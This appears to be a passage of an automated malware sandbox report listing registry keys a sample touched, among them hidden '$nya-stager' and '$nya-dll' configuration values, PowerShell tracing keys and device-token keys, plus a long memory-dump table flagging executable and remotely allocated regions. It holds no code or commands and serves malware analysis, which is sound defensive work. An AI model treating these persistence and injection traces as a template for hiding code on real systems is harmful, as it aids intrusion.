HKEY_LOCAL_MACHINE\SOFTWARE
|
$nya-stager
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE
|
$nya-dll32
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE
|
$nya-dll64
|
|
|
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProgramId
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
FileId
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LongPathHash
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Name
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
OriginalFileName
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Publisher
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Version
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinFileVersion
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinaryType
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProductName
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
ProductVersion
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
LinkDate
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
BinProductVersion
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Size
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Language
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
IsOsComponent
|
||
|
\REGISTRY\A\{20468d92-3349-c4be-2fbf-af5120dbe96d}\Root\InventoryApplicationFile\powershell.exe|bd2e1475245f53a2
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\$nya-config\pid
|
1420
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800F406D1E7F
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018800F406D1E7F
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\$nya-config\pid
|
svc64
|
There are 34 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A6605C0000
|
heap
|
page read and write
|
||
|
26A88415000
|
heap
|
page read and write
|
||
|
2BAAC601000
|
unkown
|
page read and write
|
||
|
FC84D7C000
|
stack
|
page read and write
|
||
|
2BAAA431000
|
unkown
|
page readonly
|
||
|
20E8B1C0000
|
unkown
|
page execute and read and write
|
||
|
20411757000
|
heap
|
page read and write
|
||
|
27618E34000
|
heap
|
page read and write
|
||
|
20410F9E000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1F2F3BE000
|
stack
|
page read and write
|
||
|
7FF51356D000
|
unkown
|
page readonly
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
20410F96000
|
heap
|
page read and write
|
||
|
2761A6F4000
|
heap
|
page read and write
|
||
|
7FF5A94D6000
|
unkown
|
page readonly
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
3118000
|
heap
|
page read and write
|
||
|
1DDAF205000
|
heap
|
page read and write
|
||
|
26A87E40000
|
heap
|
page read and write
|
||
|
1C8DA460000
|
unkown
|
page readonly
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
1A610120000
|
heap
|
page read and write
|
||
|
27618E6C000
|
heap
|
page read and write
|
||
|
26A87313000
|
unkown
|
page read and write
|
||
|
F25AA7E000
|
stack
|
page read and write
|
||
|
20410F00000
|
trusted library allocation
|
page read and write
|
||
|
2BAAD4EC000
|
unkown
|
page read and write
|
||
|
1DDAECD2000
|
heap
|
page read and write
|
||
|
26A87D40000
|
trusted library allocation
|
page read and write
|
||
|
28728CD7000
|
heap
|
page read and write
|
||
|
1C8DBF63000
|
heap
|
page read and write
|
||
|
1C8EDAF1000
|
trusted library allocation
|
page read and write
|
||
|
13801111000
|
trusted library allocation
|
page read and write
|
||
|
2BAAD34F000
|
unkown
|
page read and write
|
||
|
26A87E79000
|
heap
|
page read and write
|
||
|
2BAAC81A000
|
unkown
|
page read and write
|
||
|
2A660610000
|
unkown
|
page read and write
|
||
|
7FF582BE1000
|
unkown
|
page readonly
|
||
|
27618E49000
|
heap
|
page read and write
|
||
|
1E0855C3000
|
heap
|
page read and write
|
||
|
2A660602000
|
unkown
|
page read and write
|
||
|
2A66060E000
|
unkown
|
page read and write
|
||
|
2BAAE647000
|
unkown
|
page read and write
|
||
|
807437F000
|
stack
|
page read and write
|
||
|
20412FF6000
|
heap
|
page read and write
|
||
|
1C8DA462000
|
unkown
|
page readonly
|
||
|
20410FCB000
|
heap
|
page read and write
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
2A660720000
|
heap
|
page read and write
|
||
|
1C8EDAF3000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
unkown
|
page read and write
|
||
|
2295CCB0000
|
unkown
|
page readonly
|
||
|
26A87E64000
|
heap
|
page read and write
|
||
|
202C0475000
|
unkown
|
page read and write
|
||
|
138702E1000
|
heap
|
page read and write
|
||
|
2BAAC80A000
|
unkown
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
4AC9000
|
unkown
|
page read and write
|
||
|
276188B9000
|
heap
|
page read and write
|
||
|
2BAAC8CF000
|
unkown
|
page read and write
|
||
|
17953760000
|
unkown
|
page read and write
|
||
|
4C9BFE000
|
stack
|
page read and write
|
||
|
1C8DBF33000
|
heap
|
page read and write
|
||
|
26A87E88000
|
heap
|
page read and write
|
||
|
2EB9000
|
unkown
|
page read and write
|
||
|
D01AAFE000
|
unkown
|
page read and write
|
||
|
202C0B39000
|
unkown
|
page readonly
|
||
|
26A87E5E000
|
heap
|
page read and write
|
||
|
2BAAD630000
|
unkown
|
page read and write
|
||
|
20410F90000
|
heap
|
page read and write
|
||
|
28728EBA000
|
heap
|
page read and write
|
||
|
287293AF000
|
heap
|
page read and write
|
||
|
6ED55FE000
|
stack
|
page read and write
|
||
|
7FF52D126000
|
unkown
|
page readonly
|
||
|
28728E80000
|
heap
|
page read and write
|
||
|
73C0000
|
unkown
|
page read and write
|
||
|
1A610220000
|
heap
|
page read and write
|
||
|
1E0855B8000
|
heap
|
page read and write
|
||
|
2BAAC760000
|
unkown
|
page readonly
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
2295CE56000
|
unkown
|
page read and write
|
||
|
202C040A000
|
unkown
|
page read and write
|
||
|
C7E9A7E000
|
stack
|
page read and write
|
||
|
6FCD000
|
unkown
|
page read and write
|
||
|
26A87E35000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
20410F47000
|
heap
|
page read and write
|
||
|
20411782000
|
heap
|
page read and write
|
||
|
72129FE000
|
unkown
|
page readonly
|
||
|
2A660A35000
|
unkown
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
276188D5000
|
heap
|
page read and write
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
7FFD9B6DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
28728CB1000
|
heap
|
page read and write
|
||
|
225DCB39000
|
unkown
|
page read and write
|
||
|
20410FA1000
|
heap
|
page read and write
|
||
|
13870429000
|
heap
|
page read and write
|
||
|
1386FB50000
|
heap
|
page readonly
|
||
|
276187E0000
|
trusted library allocation
|
page read and write
|
||
|
1E085030000
|
trusted library allocation
|
page read and write
|
||
|
26A87E5F000
|
heap
|
page read and write
|
||
|
7415000
|
unkown
|
page read and write
|
||
|
2A6608D0000
|
unkown
|
page readonly
|
||
|
D01AFFB000
|
stack
|
page read and write
|
||
|
7FF52D0F5000
|
unkown
|
page readonly
|
||
|
1381008C000
|
trusted library allocation
|
page read and write
|
||
|
2D0D49B5000
|
heap
|
page read and write
|
||
|
1C8DBEF6000
|
heap
|
page read and write
|
||
|
20410F8A000
|
heap
|
page read and write
|
||
|
6E4E000
|
unkown
|
page read and write
|
||
|
C19D8FE000
|
stack
|
page read and write
|
||
|
1DDAE9EE000
|
heap
|
page read and write
|
||
|
26A87940000
|
unkown
|
page read and write
|
||
|
28728CB3000
|
heap
|
page read and write
|
||
|
26A87A02000
|
unkown
|
page read and write
|
||
|
1E084F76000
|
heap
|
page read and write
|
||
|
1F2F0BF000
|
stack
|
page read and write
|
||
|
25800001000
|
unkown
|
page read and write
|
||
|
1E0855C1000
|
heap
|
page read and write
|
||
|
2D0D4910000
|
heap
|
page read and write
|
||
|
2BAA7C90000
|
unkown
|
page readonly
|
||
|
1F2F239000
|
stack
|
page read and write
|
||
|
28728E50000
|
trusted library allocation
|
page read and write
|
||
|
2295D461000
|
unkown
|
page readonly
|
||
|
26A87D80000
|
trusted library allocation
|
page read and write
|
||
|
13801688000
|
trusted library allocation
|
page read and write
|
||
|
1E4E9F7B000
|
heap
|
page read and write
|
||
|
28728EBE000
|
heap
|
page read and write
|
||
|
6EFE000
|
unkown
|
page read and write
|
||
|
287293CB000
|
heap
|
page read and write
|
||
|
20412FFD000
|
heap
|
page read and write
|
||
|
2BAAA06F000
|
unkown
|
page read and write
|
||
|
7FF582BAB000
|
unkown
|
page readonly
|
||
|
2BAB0583000
|
unkown
|
page read and write
|
||
|
6E75000
|
heap
|
page execute and read and write
|
||
|
FC84FFE000
|
stack
|
page read and write
|
||
|
7FF5A93C5000
|
unkown
|
page readonly
|
||
|
6ED53FD000
|
stack
|
page read and write
|
||
|
1E084F2E000
|
heap
|
page read and write
|
||
|
7740000
|
unkown
|
page read and write
|
||
|
202C045B000
|
unkown
|
page read and write
|
||
|
7FF582B4F000
|
unkown
|
page readonly
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
7FF52D001000
|
unkown
|
page readonly
|
||
|
28728C98000
|
heap
|
page read and write
|
||
|
225DBFB0000
|
unkown
|
page read and write
|
||
|
225DC9FB000
|
unkown
|
page read and write
|
||
|
1C8DBEFC000
|
heap
|
page read and write
|
||
|
2BAAC562000
|
unkown
|
page read and write
|
||
|
8C9ABFE000
|
stack
|
page read and write
|
||
|
D01B1FC000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
287293D3000
|
heap
|
page read and write
|
||
|
1E084F51000
|
heap
|
page read and write
|
||
|
7FF550468000
|
unkown
|
page readonly
|
||
|
17953770000
|
unkown
|
page execute and read and write
|
||
|
2BAAC6D1000
|
unkown
|
page read and write
|
||
|
28728C72000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2761A6F4000
|
heap
|
page read and write
|
||
|
BC08DAB000
|
stack
|
page read and write
|
||
|
1E084F51000
|
heap
|
page read and write
|
||
|
2BAA94A8000
|
unkown
|
page read and write
|
||
|
20411764000
|
heap
|
page read and write
|
||
|
7FF58138C000
|
unkown
|
page readonly
|
||
|
D01AE78000
|
unkown
|
page read and write
|
||
|
26A87E07000
|
heap
|
page read and write
|
||
|
20411782000
|
heap
|
page read and write
|
||
|
27618E4F000
|
heap
|
page read and write
|
||
|
2A7B000
|
stack
|
page read and write
|
||
|
1DDB0A73000
|
heap
|
page read and write
|
||
|
20410FD1000
|
heap
|
page read and write
|
||
|
1DDAEA1B000
|
heap
|
page read and write
|
||
|
2041120B000
|
heap
|
page read and write
|
||
|
27618E37000
|
heap
|
page read and write
|
||
|
7FF58142C000
|
unkown
|
page readonly
|
||
|
2D0D4BD5000
|
heap
|
page read and write
|
||
|
1E0855C8000
|
heap
|
page read and write
|
||
|
225DC6E0000
|
heap
|
page read and write
|
||
|
28728CEE000
|
heap
|
page read and write
|
||
|
723D000
|
unkown
|
page read and write
|
||
|
2761889D000
|
heap
|
page read and write
|
||
|
7FF5A9521000
|
unkown
|
page readonly
|
||
|
28728CC3000
|
heap
|
page read and write
|
||
|
2BAA7CB0000
|
heap
|
page read and write
|
||
|
2A660702000
|
unkown
|
page read and write
|
||
|
7212D7E000
|
stack
|
page read and write
|
||
|
2BAADC80000
|
unkown
|
page readonly
|
||
|
2BAAE5B3000
|
unkown
|
page read and write
|
||
|
2D0D4A04000
|
heap
|
page read and write
|
||
|
807427B000
|
stack
|
page read and write
|
||
|
28728C96000
|
heap
|
page read and write
|
||
|
20410FD1000
|
heap
|
page read and write
|
||
|
26A88420000
|
heap
|
page read and write
|
||
|
2D0D49AC000
|
heap
|
page read and write
|
||
|
D01AD7E000
|
unkown
|
page read and write
|
||
|
1E4E9ED0000
|
heap
|
page read and write
|
||
|
1DDAF1E2000
|
heap
|
page read and write
|
||
|
1E084F7B000
|
heap
|
page read and write
|
||
|
28728EB3000
|
heap
|
page read and write
|
||
|
1C8EF0EB000
|
trusted library allocation
|
page read and write
|
||
|
7DF4869E1000
|
unkown
|
page execute read
|
||
|
7FF5132BD000
|
unkown
|
page readonly
|
||
|
2041120E000
|
heap
|
page read and write
|
||
|
1C8DBFF0000
|
trusted library allocation
|
page read and write
|
||
|
F25A97D000
|
stack
|
page read and write
|
||
|
28728EB7000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1E0855DC000
|
heap
|
page read and write
|
||
|
3116000
|
heap
|
page read and write
|
||
|
20410F9E000
|
heap
|
page read and write
|
||
|
28728E50000
|
trusted library allocation
|
page read and write
|
||
|
1DDAE9E5000
|
heap
|
page read and write
|
||
|
1E0855C8000
|
heap
|
page read and write
|
||
|
225DC380000
|
unkown
|
page readonly
|
||
|
1C8DDAF1000
|
trusted library allocation
|
page read and write
|
||
|
26A87E49000
|
heap
|
page read and write
|
||
|
1E084F28000
|
heap
|
page read and write
|
||
|
2D0D51D0000
|
trusted library allocation
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
4C87FE000
|
stack
|
page read and write
|
||
|
276188C2000
|
heap
|
page read and write
|
||
|
13801460000
|
trusted library allocation
|
page read and write
|
||
|
28728EBE000
|
heap
|
page read and write
|
||
|
1E084F07000
|
heap
|
page read and write
|
||
|
27618891000
|
heap
|
page read and write
|
||
|
7FFD9BA1C000
|
trusted library allocation
|
page read and write
|
||
|
FC8467C000
|
stack
|
page read and write
|
||
|
2BAAC7D8000
|
unkown
|
page read and write
|
||
|
225DBFF7000
|
heap
|
page read and write
|
||
|
26A87E25000
|
heap
|
page read and write
|
||
|
FC84BFE000
|
stack
|
page read and write
|
||
|
2BAACB72000
|
unkown
|
page read and write
|
||
|
72FE000
|
unkown
|
page read and write
|
||
|
7FF52D1B9000
|
unkown
|
page readonly
|
||
|
2BAAC585000
|
unkown
|
page read and write
|
||
|
28728CBA000
|
heap
|
page read and write
|
||
|
7FF52D1B2000
|
unkown
|
page readonly
|
||
|
26A87E7A000
|
heap
|
page read and write
|
||
|
1DDAECDA000
|
heap
|
page read and write
|
||
|
7FF5812EB000
|
unkown
|
page readonly
|
||
|
287293D9000
|
heap
|
page read and write
|
||
|
2BAAC964000
|
unkown
|
page read and write
|
||
|
FC846FE000
|
stack
|
page read and write
|
||
|
1C8DBF1B000
|
heap
|
page read and write
|
||
|
28728C68000
|
heap
|
page read and write
|
||
|
2CC0000
|
unkown
|
page read and write
|
||
|
755E000
|
unkown
|
page read and write
|
||
|
F25A9FE000
|
stack
|
page read and write
|
||
|
1C8DAE62000
|
unkown
|
page readonly
|
||
|
1E4EB920000
|
heap
|
page read and write
|
||
|
7FF52CEBF000
|
unkown
|
page readonly
|
||
|
20411789000
|
heap
|
page read and write
|
||
|
287293A7000
|
heap
|
page read and write
|
||
|
72127FE000
|
unkown
|
page readonly
|
||
|
7FF58141E000
|
unkown
|
page readonly
|
||
|
2BAAC973000
|
unkown
|
page read and write
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
8140000
|
unkown
|
page readonly
|
||
|
202BFD02000
|
unkown
|
page read and write
|
||
|
7FF582BA6000
|
unkown
|
page readonly
|
||
|
28728EB0000
|
heap
|
page read and write
|
||
|
2BAAA061000
|
unkown
|
page read and write
|
||
|
7212BFE000
|
unkown
|
page readonly
|
||
|
1E0855C2000
|
heap
|
page read and write
|
||
|
1DDAEA25000
|
heap
|
page read and write
|
||
|
1CC91450000
|
unkown
|
page execute and read and write
|
||
|
8C9A8FF000
|
stack
|
page read and write
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
28728C94000
|
heap
|
page read and write
|
||
|
1DDAE990000
|
heap
|
page read and write
|
||
|
13870160000
|
heap
|
page read and write
|
||
|
26A87E4E000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAEA39000
|
heap
|
page read and write
|
||
|
1386FC80000
|
heap
|
page read and write
|
||
|
202C03BA000
|
unkown
|
page read and write
|
||
|
26A87E32000
|
heap
|
page read and write
|
||
|
8C9A4FE000
|
stack
|
page read and write
|
||
|
28728F15000
|
heap
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
138702E5000
|
heap
|
page read and write
|
||
|
1E084F59000
|
heap
|
page read and write
|
||
|
2BAB2FD9000
|
unkown
|
page readonly
|
||
|
7FF5A9557000
|
unkown
|
page readonly
|
||
|
138704F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF5A9502000
|
unkown
|
page readonly
|
||
|
BA730E9000
|
stack
|
page read and write
|
||
|
1DDAE9C7000
|
heap
|
page read and write
|
||
|
2BAAE406000
|
unkown
|
page read and write
|
||
|
3F99EFF000
|
stack
|
page read and write
|
||
|
1E084F3F000
|
heap
|
page read and write
|
||
|
F25A5B2000
|
stack
|
page read and write
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
A81DEFF000
|
stack
|
page read and write
|
||
|
28728CF0000
|
heap
|
page read and write
|
||
|
7FF582AE5000
|
unkown
|
page readonly
|
||
|
1795302B000
|
unkown
|
page read and write
|
||
|
28728EBA000
|
heap
|
page read and write
|
||
|
225DCA02000
|
unkown
|
page read and write
|
||
|
20411768000
|
heap
|
page read and write
|
||
|
287293B2000
|
heap
|
page read and write
|
||
|
26A87E43000
|
heap
|
page read and write
|
||
|
2295CD40000
|
heap
|
page read and write
|
||
|
7DF486A11000
|
unkown
|
page execute read
|
||
|
FC84B7B000
|
stack
|
page read and write
|
||
|
13801902000
|
trusted library allocation
|
page read and write
|
||
|
7FF52CE08000
|
unkown
|
page readonly
|
||
|
22D86210000
|
heap
|
page read and write
|
||
|
20410F77000
|
heap
|
page read and write
|
||
|
2BAAEB40000
|
unkown
|
page read and write
|
||
|
1E085030000
|
trusted library allocation
|
page read and write
|
||
|
2BAAA451000
|
unkown
|
page readonly
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
7FF51358B000
|
unkown
|
page readonly
|
||
|
2BAAE5AD000
|
unkown
|
page read and write
|
||
|
20413150000
|
heap
|
page read and write
|
||
|
2D0D57FF000
|
trusted library allocation
|
page read and write
|
||
|
1E086E5D000
|
heap
|
page read and write
|
||
|
1DDAF1D0000
|
heap
|
page read and write
|
||
|
225DC690000
|
unkown
|
page read and write
|
||
|
2761A6E7000
|
heap
|
page read and write
|
||
|
2BAA94C2000
|
unkown
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
2A660560000
|
unkown
|
page readonly
|
||
|
7DF486A91000
|
unkown
|
page execute read
|
||
|
A81DBAB000
|
stack
|
page read and write
|
||
|
2BAACBC0000
|
unkown
|
page read and write
|
||
|
D01BCCB000
|
unkown
|
page read and write
|
||
|
7FF52D13E000
|
unkown
|
page readonly
|
||
|
225DCB70000
|
unkown
|
page readonly
|
||
|
1E084F3F000
|
heap
|
page read and write
|
||
|
2BAA946C000
|
unkown
|
page read and write
|
||
|
23ED9900000
|
heap
|
page read and write
|
||
|
7DF486A51000
|
unkown
|
page execute read
|
||
|
27618891000
|
heap
|
page read and write
|
||
|
7FF5A94C8000
|
unkown
|
page readonly
|
||
|
7FFDE21F0000
|
unkown
|
page execute read
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1DDAEA0D000
|
heap
|
page read and write
|
||
|
27618877000
|
heap
|
page read and write
|
||
|
7FF58130A000
|
unkown
|
page readonly
|
||
|
727B000
|
unkown
|
page read and write
|
||
|
4A6E000
|
unkown
|
page read and write
|
||
|
287293D2000
|
heap
|
page read and write
|
||
|
202BFBF0000
|
unkown
|
page read and write
|
||
|
20410F89000
|
heap
|
page read and write
|
||
|
2BAAC9F2000
|
unkown
|
page read and write
|
||
|
20411763000
|
heap
|
page read and write
|
||
|
2BAAC570000
|
unkown
|
page read and write
|
||
|
20411765000
|
heap
|
page read and write
|
||
|
20410F8B000
|
heap
|
page read and write
|
||
|
2D0D5040000
|
trusted library allocation
|
page read and write
|
||
|
A9252FF000
|
unkown
|
page read and write
|
||
|
276188CE000
|
heap
|
page read and write
|
||
|
1E4E9F92000
|
heap
|
page read and write
|
||
|
2220C4F0000
|
unkown
|
page execute and read and write
|
||
|
7419000
|
unkown
|
page read and write
|
||
|
2BAAD1A0000
|
unkown
|
page read and write
|
||
|
24D9FF40000
|
unkown
|
page execute and read and write
|
||
|
8B38AFE000
|
unkown
|
page readonly
|
||
|
C5F64FE000
|
unkown
|
page readonly
|
||
|
26A87E4C000
|
heap
|
page read and write
|
||
|
7DF486A61000
|
unkown
|
page execute read
|
||
|
26A87DF0000
|
heap
|
page read and write
|
||
|
20410F99000
|
heap
|
page read and write
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
1C8DB0A2000
|
unkown
|
page readonly
|
||
|
7FF5123FD000
|
unkown
|
page readonly
|
||
|
20410F9E000
|
heap
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
20410FD1000
|
heap
|
page read and write
|
||
|
2BAADE80000
|
unkown
|
page read and write
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
2BAAAF66000
|
unkown
|
page read and write
|
||
|
7FF51342C000
|
unkown
|
page readonly
|
||
|
1DDAECD0000
|
heap
|
page read and write
|
||
|
138100AE000
|
trusted library allocation
|
page read and write
|
||
|
2A660700000
|
unkown
|
page read and write
|
||
|
3100000
|
unkown
|
page read and write
|
||
|
2A6605F0000
|
unkown
|
page read and write
|
||
|
7FF512431000
|
unkown
|
page readonly
|
||
|
2BAAAD49000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
24D9FE61000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAF1FC000
|
heap
|
page read and write
|
||
|
276188F9000
|
heap
|
page read and write
|
||
|
2BAA78F0000
|
unkown
|
page readonly
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
2BAAAD13000
|
unkown
|
page read and write
|
||
|
1E085080000
|
heap
|
page read and write
|
||
|
1386FB60000
|
trusted library allocation
|
page read and write
|
||
|
27B04B2E000
|
unkown
|
page read and write
|
||
|
2BAAE593000
|
unkown
|
page read and write
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
17952FD0000
|
heap
|
page read and write
|
||
|
20411204000
|
heap
|
page read and write
|
||
|
7E0073645000
|
unkown
|
page readonly
|
||
|
2D0D4920000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1E0855E9000
|
heap
|
page read and write
|
||
|
2BAAE160000
|
unkown
|
page read and write
|
||
|
1C8DBF94000
|
heap
|
page read and write
|
||
|
2BAAC520000
|
unkown
|
page read and write
|
||
|
4CA3FE000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
20411750000
|
heap
|
page read and write
|
||
|
2BAA7B6D000
|
heap
|
page read and write
|
||
|
7FF52D1C7000
|
unkown
|
page readonly
|
||
|
27618E33000
|
heap
|
page read and write
|
||
|
7FF512444000
|
unkown
|
page readonly
|
||
|
2BAAAD1F000
|
unkown
|
page read and write
|
||
|
2BAAE353000
|
unkown
|
page read and write
|
||
|
21A1F67D000
|
heap
|
page read and write
|
||
|
7FF52D03B000
|
unkown
|
page readonly
|
||
|
26A87E64000
|
heap
|
page read and write
|
||
|
27618900000
|
heap
|
page read and write
|
||
|
684C67E000
|
stack
|
page read and write
|
||
|
2BAADCD0000
|
unkown
|
page read and write
|
||
|
2BAAD710000
|
unkown
|
page readonly
|
||
|
27B0412E000
|
unkown
|
page read and write
|
||
|
138016A6000
|
trusted library allocation
|
page read and write
|
||
|
1E085060000
|
heap
|
page read and write
|
||
|
6ED56FE000
|
unkown
|
page readonly
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
49FE000
|
unkown
|
page read and write
|
||
|
4C8BFE000
|
stack
|
page read and write
|
||
|
7212DFE000
|
unkown
|
page readonly
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
7FF5504E2000
|
unkown
|
page readonly
|
||
|
7FF512372000
|
unkown
|
page readonly
|
||
|
202C02B2000
|
unkown
|
page read and write
|
||
|
F25B9CE000
|
stack
|
page read and write
|
||
|
1E0855BC000
|
heap
|
page read and write
|
||
|
2761A6E2000
|
heap
|
page read and write
|
||
|
1DDAF1E4000
|
heap
|
page read and write
|
||
|
27B0372E000
|
unkown
|
page read and write
|
||
|
138019CB000
|
trusted library allocation
|
page read and write
|
||
|
26A88431000
|
heap
|
page read and write
|
||
|
